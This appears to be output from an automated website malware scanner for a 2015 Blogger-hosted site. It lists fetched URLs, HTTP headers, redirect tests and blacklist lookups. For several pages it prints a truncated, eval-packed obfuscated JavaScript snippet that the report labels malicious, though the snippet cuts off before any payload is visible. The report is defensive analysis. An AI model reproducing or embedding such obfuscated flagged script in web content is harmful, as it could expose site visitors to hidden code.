Scanned pages/files
Request | Server response | Status |
http://khatsii.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:09 GMT Location: http://www.khatsii.com/ Server: ghs Content-Length: 220 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.khatsii.com/ | 200 OK Content-Length: 116608 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12790 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 161933 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 115360 Content-Type: application/javascript | clean |
http://khatsii.com/feeds/posts/default?alt=json-in-script&callback=av | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:14 GMT Location: http://www.khatsii.com/feeds/posts/default?alt=json-in-script&callback=av Server: ghs Content-Length: 274 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.khatsii.com/feeds/posts/default?alt=json-in-script&callback=av | 200 OK Content-Length: 10604 Content-Type: text/javascript | clean |
http://yourjavascript.com/00911305131/pagenavigation.txt.js | 200 OK Content-Length: 3497 Content-Type: text/javascript | clean |
https://cdn.firebase.com/v0/firebase.js | 200 OK Content-Length: 75290 Content-Type: application/javascript | clean |
https://www.blogger.com/static/v1/widgets/3512243057-widgets.js | 200 OK Content-Length: 90257 Content-Type: text/javascript | clean |
http://khatsii.com//www.google.com/jsapi/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 07:11:15 GMT Location: http://www.khatsii.com//www.google.com/jsapi/ Server: ghs Content-Length: 242 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.08 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.khatsii.com//www.google.com/jsapi/ | 404 Not Found Content-Length: 93783 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
| ||
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=PageList&widgetId=PageList1&action=editWidget§ionId=site-header-w1/ | 404 Not Found Content-Length: 94304 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
| ||
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=Text&widgetId=Text1&action=editWidget§ionId=site-header-w1/ | 404 Not Found Content-Length: 94272 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
| ||
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=Attribution&widgetId=Attribution1&action=editWidget§ionId=site-header-w1/ | 404 Not Found Content-Length: 94328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
| ||
http://www.khatsii.com//www.blogger.com/rearrange?blogID=2459544974545496382&widgetType=FollowByEmail&widgetId=FollowByEmail1&action=editWidget§ionId=site-header-w1/ | 404 Not Found Content-Length: 94344 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=7; var numshowpage=2; var upPageWord ='�'; var downPageWord ='�'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('eN(eC(p,a,c,k,e,d){e=eC(c){eD(c<a?\'\':e(eK(c/a)))+((c=c%a)>35?eF.eJ(c+29):c.eH(36))};if(!\'\'.eG(/^/,eF)){eE(c--){d[e(c)]=k[c]||e(c)}k=[eC(e){eD d[e]}];e=eC(){eD\'\\\\w+\'};c=1};eE(c--){if(k[c]){p=p.eG(eI eL(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}eD p}(\'cH(7u(p,a,c,k,e, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: khatsii.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 07:11:09 GMT
Location: http://www.khatsii.com/
Server: ghs
Content-Length: 220
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.08
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...220 bytes of data.
GET / HTTP/1.1
Host: khatsii.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 07:11:09 GMT
Location: http://www.khatsii.com/
Server: ghs
Content-Length: 220
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.08
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...220 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: khatsii.com
Referer: http://www.google.com/search?q=khatsii.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: khatsii.com
Referer: http://www.google.com/search?q=khatsii.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=khatsii.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khatsii.com/
Result: khatsii.com is not infected or malware details are not published yet.
Result: khatsii.com is not infected or malware details are not published yet.